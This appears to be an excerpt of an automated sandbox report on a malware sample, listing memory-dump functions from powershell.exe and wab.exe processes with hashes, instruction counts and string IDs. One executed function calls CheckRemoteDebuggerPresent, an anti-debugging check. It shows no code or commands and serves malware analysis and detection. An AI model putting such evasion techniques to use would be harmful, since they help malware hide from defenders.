                                                              • API String ID:
                                                              • Opcode ID: 893c96d882b8a184432f998a47c361f0f24874203602f28ca8ccca7a713d7d7b
                                                              • Instruction ID: 4e5e8a97ed63b35bb9e50ced1942842c202b49523c25b93df5164f1f3b0e2504
                                                              • Opcode Fuzzy Hash: 893c96d882b8a184432f998a47c361f0f24874203602f28ca8ccca7a713d7d7b
                                                              • Instruction Fuzzy Hash: AC71BE30A002098FDB14DF69C884A9DBBF6FF85714F14C96AE415EB792DB71AC46CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02E095F6 Relevance: .2, Instructions: 188COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2050659974.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2e00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8d3c9e3cd599739dc297222e61cce8b6cdb2606fa70876be08fb46d499afb35d
                                                              • Instruction ID: 7d3698830df4d3a58e18a8dd673404302482200231d45c2eddb63811af18a08f
                                                              • Opcode Fuzzy Hash: 8d3c9e3cd599739dc297222e61cce8b6cdb2606fa70876be08fb46d499afb35d
                                                              • Instruction Fuzzy Hash: 18714D70E00248DFDB14DFA5D484BADBBF6BF88704F148869D412AB7A1DB35AC86CB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02E09473 Relevance: .1, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2050659974.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2e00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8fe053bafe109a22b502facdf1ac513daf9130a452248df25cf5ed3263016fb1
                                                              • Instruction ID: 2ae17d5b82bf1d89c0ee3bb6d6a9685be41b07b74c0ae96b85f754742e31ec95
                                                              • Opcode Fuzzy Hash: 8fe053bafe109a22b502facdf1ac513daf9130a452248df25cf5ed3263016fb1
                                                              • Instruction Fuzzy Hash: 56517C70E40205DFDB14DFA5C8847ADBBB2FF84754F148869D006AB792DB74A886CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02E09219 Relevance: .1, Instructions: 119COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2050659974.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2e00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 538475fd5114332e27facd12c92b064e8faa5b4e07b3c7e685a8ea337cef265c
                                                              • Instruction ID: a78daf98b30306fbd8ccb814a17392f08f001544ea70482c39dfa5104e8089dd
                                                              • Opcode Fuzzy Hash: 538475fd5114332e27facd12c92b064e8faa5b4e07b3c7e685a8ea337cef265c
                                                              • Instruction Fuzzy Hash: F2418131A402108FD718DF74D998AAD7BB2FF89758F189469E406EB7A2CB349C41CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02E02C58 Relevance: .1, Instructions: 113COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2050659974.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2e00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e78b9f7148bbbdd130b13f09e310de997b3b68dcd61a8a6c324f5700976efd7e
                                                              • Instruction ID: b411ee988652aae1c2111cc7bb197da0068985648e8ae629e7bdddfdeea5416c
                                                              • Opcode Fuzzy Hash: e78b9f7148bbbdd130b13f09e310de997b3b68dcd61a8a6c324f5700976efd7e
                                                              • Instruction Fuzzy Hash: 774109749006059FCB05CF59C4D8AEAFBB1FF89314B11815AD915AB7A4C736FC91CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 08106230 Relevance: .1, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2063679057.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_8100000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cb6da1c6c280d763a8fe6b8eda7510682f7bec552316ae3f7503b330afaf4dee
                                                              • Instruction ID: 9258432c349f138a5f8e3475e28b8aaf0acb26ceea8a8be470033797adfd466e
                                                              • Opcode Fuzzy Hash: cb6da1c6c280d763a8fe6b8eda7510682f7bec552316ae3f7503b330afaf4dee
                                                              • Instruction Fuzzy Hash: 36411974A012099FDB15CF98C894AAEBBB1FF89310B248259D815AB3A0D775EC91CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 07437036 Relevance: .1, Instructions: 102COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2059200947.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7430000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f5b300ee7638daf438375b3054831729bc45852607862c308f36f5f357e7e248
                                                              • Instruction ID: ead53411f20c6e01607a5a4b79586534fc165124eccb76cd46eab4368c5f5a77
                                                              • Opcode Fuzzy Hash: f5b300ee7638daf438375b3054831729bc45852607862c308f36f5f357e7e248
                                                              • Instruction Fuzzy Hash: D0319170B102049BF704AB64C855BAEB7B3ABCA714F60C459EA057F381CF7ADC428B91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0743E0E7 Relevance: .1, Instructions: 102COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2059200947.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7430000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a7aeee2876245c95f6db801287d658c66d4542330602949140986faa4a78453f
                                                              • Instruction ID: 56630e027072b52544583e941a7ba13fab493ceefbc7aa71cd26d19fad298084
                                                              • Opcode Fuzzy Hash: a7aeee2876245c95f6db801287d658c66d4542330602949140986faa4a78453f
                                                              • Instruction Fuzzy Hash: 0531C8B0A062229FDF205E7154007FAB7A1AF8A250F1440ABC859DB381EB35DC42C7A2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0743E108 Relevance: .1, Instructions: 87COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2059200947.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7430000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 231eaf8ccff9e797a75f46a5b94bf3e12fa5629c48a29f9f65610a50434030dd
                                                              • Instruction ID: 4785181f1f56f69a1cf01b7a27ed5d7bab58eaa591ec92c3dc93cfd53e284883
                                                              • Opcode Fuzzy Hash: 231eaf8ccff9e797a75f46a5b94bf3e12fa5629c48a29f9f65610a50434030dd
                                                              • Instruction Fuzzy Hash: 6C21ECF0B02222DFDF244E6594007BBB6E16F89610F14447BD9199F381EB35DD41CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02E0C2E4 Relevance: .1, Instructions: 80COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2050659974.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2e00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b7597ddc804dcff807d1d9b9452adcff49f9f1b6a8013386033b8675df88075a
                                                              • Instruction ID: d79bbca2239109c6a999216ad9f47af0b740f36b4227449bacff107007301f32
                                                              • Opcode Fuzzy Hash: b7597ddc804dcff807d1d9b9452adcff49f9f1b6a8013386033b8675df88075a
                                                              • Instruction Fuzzy Hash: 22313E30B012588FDB269B34D8947EEB7B2BF89308F1454E9D4099B391DB358E86CF81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02E031C8 Relevance: .1, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2050659974.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2e00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 097ffabaf8915d128ad850585e1096d6912aea74588363d3ca09dd39fcf194b8
                                                              • Instruction ID: 4b0ea0da710c51c2c867f10e50253f7f4a86d4fb1ed5d24684ef73abf88bb3c6
                                                              • Opcode Fuzzy Hash: 097ffabaf8915d128ad850585e1096d6912aea74588363d3ca09dd39fcf194b8
                                                              • Instruction Fuzzy Hash: 22213E74A042599FCB00CF98D480AAEFBB5FF8D310B148196D819EB352C735ED42CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02E039B0 Relevance: .1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2050659974.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2e00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 982fef52c2d294147ff09e3480228267089b5d0852fe37991e6df64b2635abe8
                                                              • Instruction ID: 4979bc37bda47e7b6568d3038fc58c6cba2d13df9f178ceb6fbe76342d016c76
                                                              • Opcode Fuzzy Hash: 982fef52c2d294147ff09e3480228267089b5d0852fe37991e6df64b2635abe8
                                                              • Instruction Fuzzy Hash: BD21C874A00619DFCB04DF89C984AAAF7B1FF8C310B158199D919E7751C735EC91CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02B6D006 Relevance: .0, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2049953382.0000000002B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B6D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2b6d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6cdcb6240d36ca26cfd0a6b20af67d11320635cddb79889af581a2897033bd3b
                                                              • Instruction ID: 9d51252e3f0af8a16c4278cb1c3378cc67d29d6f178b596509d48d17b0179319
                                                              • Opcode Fuzzy Hash: 6cdcb6240d36ca26cfd0a6b20af67d11320635cddb79889af581a2897033bd3b
                                                              • Instruction Fuzzy Hash: A7015E7250D3C49FD7124B258CA8762BFA8DF53624F1984DBE8888F1A3D26D5C45CB72
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02B6D01D Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2049953382.0000000002B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B6D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2b6d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c5efb0fbb2e47b72bde999f39da8cc229f16c7f441900f6f976b78701586bdca
                                                              • Instruction ID: cd1e3bcee5344f05a38d8c091f3621cb609e322dcbd7f634fa504fdfbce3426e
                                                              • Opcode Fuzzy Hash: c5efb0fbb2e47b72bde999f39da8cc229f16c7f441900f6f976b78701586bdca
                                                              • Instruction Fuzzy Hash: 130126716043459BE7204E25CCD8B77BF98EF81625F18C4AAEC080B282C77D9841CBB2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02E091AD Relevance: .0, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2050659974.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2e00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2b2711a8e076e0e8f2e672553558aadc0de0e49a46cba911600c189155b04a59
                                                              • Instruction ID: e586ccc1a5ce0dd26acb8f50df16190a8bb5f23b3e861e4f83a160f723d12c87
                                                              • Opcode Fuzzy Hash: 2b2711a8e076e0e8f2e672553558aadc0de0e49a46cba911600c189155b04a59
                                                              • Instruction Fuzzy Hash: BAF03070B403068FEB04DFA4D599BAE77B2BF84744F108954D5069F299CB789D49CBC0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Function 074374B0 Relevance: 10.3, Strings: 8, Instructions: 305COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2059200947.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7430000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (fl$(fl$(fl$(fl$(fl$(fl$(fl$(fl
                                                              • API String ID: 0-747792303
                                                              • Opcode ID: 45896f9cfb3405b2881e552cba8d087fd600ff010a0b7ebb4882992d8d4f4ddc
                                                              • Instruction ID: 9cc7d3dfe89f828ba6e53de443f554025c7546678a3ba8c15bcfd4d6084b6bec
                                                              • Opcode Fuzzy Hash: 45896f9cfb3405b2881e552cba8d087fd600ff010a0b7ebb4882992d8d4f4ddc
                                                              • Instruction Fuzzy Hash: B5C1C9F0E00205DBD7259F58C491AABBBF2AF8D711F24C56AC84A6B744CB35EC42CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0743E8C0 Relevance: 5.4, Strings: 4, Instructions: 399COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2059200947.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7430000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 84l$84l$84l$84l
                                                              • API String ID: 0-3024328185
                                                              • Opcode ID: 5d715fda67bb13a17b96fd763e8354558200766bbb0ebf0d706af333e356550a
                                                              • Instruction ID: f39260d7a00df870324997d05b31207f36d2ebd233f03a9fb19be52eb8546306
                                                              • Opcode Fuzzy Hash: 5d715fda67bb13a17b96fd763e8354558200766bbb0ebf0d706af333e356550a
                                                              • Instruction Fuzzy Hash: D3D1F671B013258FEB159B54C804BAABBA2FFCE610F18C46BE8599B391DB31DC42C791
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0743D5E8 Relevance: 5.4, Strings: 4, Instructions: 393COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2059200947.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7430000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (fl$(fl$(fl$(fl
                                                              • API String ID: 0-2123353879
                                                              • Opcode ID: 97a906a80eaa7e7b2769087ca929193519fcb3e4ca38f15f19438229b6fa3531
                                                              • Instruction ID: ece9d911b0141b57b302d2f101dff7d23522df305c477514cbc4119b83275363
                                                              • Opcode Fuzzy Hash: 97a906a80eaa7e7b2769087ca929193519fcb3e4ca38f15f19438229b6fa3531
                                                              • Instruction Fuzzy Hash: 55F15CB4F00205DFE714DF94C541AAAB7B2AF8E315F24856AD819AB744DB32EC42CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 07437492 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2059200947.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7430000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (fl$(fl$(fl$(fl
                                                              • API String ID: 0-2123353879
                                                              • Opcode ID: 09cb2fad8f90878c584af915b170006bc88398b1f892f5d2cac0a34d19223e3f
                                                              • Instruction ID: ea39732f35e7e9c7f4fae682be8548e247a2595027acfe3934d09108409b68fd
                                                              • Opcode Fuzzy Hash: 09cb2fad8f90878c584af915b170006bc88398b1f892f5d2cac0a34d19223e3f
                                                              • Instruction Fuzzy Hash: 40A17EF4A11205DBDB258F54C490AABBBB2BF8E314F24C56BD89A6B744C735E842CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 074371F0 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2059200947.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7430000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (fl$(fl$(fl$(fl
                                                              • API String ID: 0-2123353879
                                                              • Opcode ID: 2809865893fc32c1c7ad8383609050c7496353bc6778eb26017c705a60456fba
                                                              • Instruction ID: f2ebe70ee85754da7e9c75cc7a047e2e4c568600ec4f9002f83b873d4d32d2e4
                                                              • Opcode Fuzzy Hash: 2809865893fc32c1c7ad8383609050c7496353bc6778eb26017c705a60456fba
                                                              • Instruction Fuzzy Hash: BE717EB0A10205DBEB15DF58C481EAABBF2AF8D314F24C56AD859AB351CB35EC41CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0743D330 Relevance: 5.2, Strings: 4, Instructions: 191COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2059200947.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7430000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (fl$(fl$(fl$(fl
                                                              • API String ID: 0-2123353879
                                                              • Opcode ID: 4e3543495ae99e25d1b65a48797ab48350b76d176dc71957f5cc466763cf1a99
                                                              • Instruction ID: 3716c97b4a3ecdf8b17fb4596c6dd562809141dd32c07312915b6ee96e13f117
                                                              • Opcode Fuzzy Hash: 4e3543495ae99e25d1b65a48797ab48350b76d176dc71957f5cc466763cf1a99
                                                              • Instruction Fuzzy Hash: 76618FB0F002059BEB14DB58C854BABB7F2AFCD614F2584AAD809AB351DB35EC41CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage:8.6%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:100%
                                                              Total number of Nodes:3
                                                              Total number of Limit Nodes:0
                                                              execution_graph 14298 2df7ed0 14299 2df7f14 CheckRemoteDebuggerPresent 14298->14299 14300 2df7f56 14299->14300

                                                              Executed Functions

                                                              Function 02DF7ED0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 6 2df7ed0-2df7f54 CheckRemoteDebuggerPresent 8 2df7f5d-2df7f98 6->8 9 2df7f56-2df7f5c 6->9 9->8
                                                              APIs
                                                              • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 02DF7F47
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.2765301944.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2df0000_wab.jbxd
                                                              Similarity
                                                              • API ID: CheckDebuggerPresentRemote
                                                              • String ID:
                                                              • API String ID: 3662101638-0
                                                              • Opcode ID: d823234f42de6606282ccf36a9fe859cd82de78667a55ea092fd390af927a643
                                                              • Instruction ID: c248fde109ee47f880912544e60b443f745484ac707a34a3e4b803b433fe4a52
                                                              • Opcode Fuzzy Hash: d823234f42de6606282ccf36a9fe859cd82de78667a55ea092fd390af927a643
                                                              • Instruction Fuzzy Hash: 872159B19002598FDB10CF9AD484BEEFBF4AF49310F15845AE459A3340D778A944CF65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02DF7EC8 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 2df7ec8-2df7f54 CheckRemoteDebuggerPresent 2 2df7f5d-2df7f98 0->2 3 2df7f56-2df7f5c 0->3 3->2
                                                              APIs
                                                              • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 02DF7F47
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.2765301944.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2df0000_wab.jbxd
                                                              Similarity
                                                              • API ID: CheckDebuggerPresentRemote
                                                              • String ID:
                                                              • API String ID: 3662101638-0
                                                              • Opcode ID: a80ff9f32f1775dd677257b85f20e35e3b1466e66761ff9ff7724c601193bbe7
                                                              • Instruction ID: ba88a4f69828c8bf6e3922840b493f07e56f1d8ee16586651832f8f551587391
                                                              • Opcode Fuzzy Hash: a80ff9f32f1775dd677257b85f20e35e3b1466e66761ff9ff7724c601193bbe7
                                                              • Instruction Fuzzy Hash: E52178B190025A8FDB00CFAAD484BEEFBF4AF49320F15845AE459A7350D778A944CF60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02DBD4D8 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.2764870148.0000000002DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DBD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2dbd000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cf176c2a0c6461d192ced5e5868fe5d93a43e540db4eb2fe6dd7f781b24a1880
                                                              • Instruction ID: 5bb073e4319216254fa0041eb020df1073d42874cce3fd971be45a028efffda0
                                                              • Opcode Fuzzy Hash: cf176c2a0c6461d192ced5e5868fe5d93a43e540db4eb2fe6dd7f781b24a1880
                                                              • Instruction Fuzzy Hash: C62103B1604304DFDB06DF14D9D4B56BBA6FF89328F208169D84A0B356C336D856CBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02DCD110 Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.2764928182.0000000002DCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DCD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2dcd000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 97ef65fbb3b67328be3f79c198e63d189e6d2a8a1b976bc63cdad1777bf8b50d
                                                              • Instruction ID: 9d816dd5baa26e4dd167e8056ce23f92b914bc82634090c18fede8fb2cb6225d
                                                              • Opcode Fuzzy Hash: 97ef65fbb3b67328be3f79c198e63d189e6d2a8a1b976bc63cdad1777bf8b50d
                                                              • Instruction Fuzzy Hash: 6821D0B5604305EFDB04DF10DDC4B26BBA2EB88214F34C5BDD8494B346C376D846CA62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02DBD4D3 Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.2764870148.0000000002DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DBD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2dbd000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9608e99869a3ea36420784c31bc91d36e9dbf26f6d733506b74b974621167111
                                                              • Instruction ID: 04792b367d247812c211b8e63bd662445e630595eb8f905ed2d96f80c56433a5
                                                              • Opcode Fuzzy Hash: 9608e99869a3ea36420784c31bc91d36e9dbf26f6d733506b74b974621167111
                                                              • Instruction Fuzzy Hash: DD11B176504240CFCB16CF14D5C4B56BFB2FF85328F2486A9D84A0B356C33AD856CBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 02DCD10B Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.2764928182.0000000002DCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DCD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2dcd000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0be0911e4ec380e38d32cc199c2f052513f6584ca277e8337b0e0836e339b5e0
                                                              • Instruction ID: 7966e9ea170df4886384bbe141332807e3c4efec911c1b45105b50997e470fe1
                                                              • Opcode Fuzzy Hash: 0be0911e4ec380e38d32cc199c2f052513f6584ca277e8337b0e0836e339b5e0
                                                              • Instruction Fuzzy Hash: 26119075504244DFCB15CF14D9C4B15BB62FB88324F24C6AEDC494B756C33AD84ACB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Function 02DFF568 Relevance: .4, Instructions: 422COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.2765301944.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_2df0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5eb8d98c79b0f8ae949a8d4a80b8dda3f4d0a8e55ae025eb1ee09bd295afc10f
                                                              • Instruction ID: 04455f58ff5d0ad176dc768b71419767eeba4da87370815f2f21de2b1bc3761d
                                                              • Opcode Fuzzy Hash: 5eb8d98c79b0f8ae949a8d4a80b8dda3f4d0a8e55ae025eb1ee09bd295afc10f
                                                              • Instruction Fuzzy Hash: 77F15F30A002099FDB54DFA8D4907AEB7B6FF84710F218529D906EB794DB75EC42CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%